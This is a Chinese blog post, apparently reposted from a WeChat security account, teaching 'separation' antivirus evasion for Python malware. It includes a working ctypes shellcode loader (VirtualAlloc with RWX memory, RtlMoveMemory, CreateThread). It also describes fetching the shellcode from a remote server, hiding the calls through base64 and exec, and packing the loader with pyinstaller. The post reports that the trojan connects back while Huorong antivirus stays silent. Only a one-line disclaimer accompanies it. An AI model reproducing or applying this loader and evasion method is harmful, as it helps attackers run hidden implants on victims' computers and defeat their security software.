基于Python分离免杀思路

声明：请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

大家好，X师傅又和大家见面啦，今天为大家带来python分离免杀的思路分享

分离免杀：重要的是分离，无代码落地，无shellcode落地，让杀软查杀无法发现恶意代码和shellcode让杀软无从下手

免杀的代码主要运行在x86平台，因为现在x64平台可兼容x86的程序，所以x86的马子也可以在x64平台运行

基于Python免杀，首先查看shellcode，shellcode使用python的或者C的都可以，其他的就不知道了，没测试，下面以C的shellcode为例子。

import ctypes
shellcode=b"x01xff.....shellcode....."
#32位加载器方法一rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

测试一下替换shellcode，木马还是能够正常上线的

当然现在也是不免杀的，先其将分离，就是将shellcode和代码放到服务器上让文件去请求shellcode和执行代码

下面我们一步一步来

先将shellcode写入服务器txt文件

然后服务器去请求shellcode

上线成功

但是还是不免杀，因为我们下面执行的命令也是查杀的关键字，所以我们还要把下面的命令做一个混淆，将命令合并成3条，将后两条命令base64编码赋值给变量a，使用Python中的exec运行解码后的变量a，解码后变成两条命令，Python中的exec可以执行多条命令，他是可以分开执行的，当然eval也可以，但是eval只能执行一条命令，所以这里使用exec

Ok上线并且火绒免杀

使用pyinstaller -F -w shell.py打包成exe在x64平台测试一下，发现火绒并没报毒，免杀上线。

站岗小狗为您服务

原文始发于微信公众号（HexaGoners）：基于Python分离免杀思路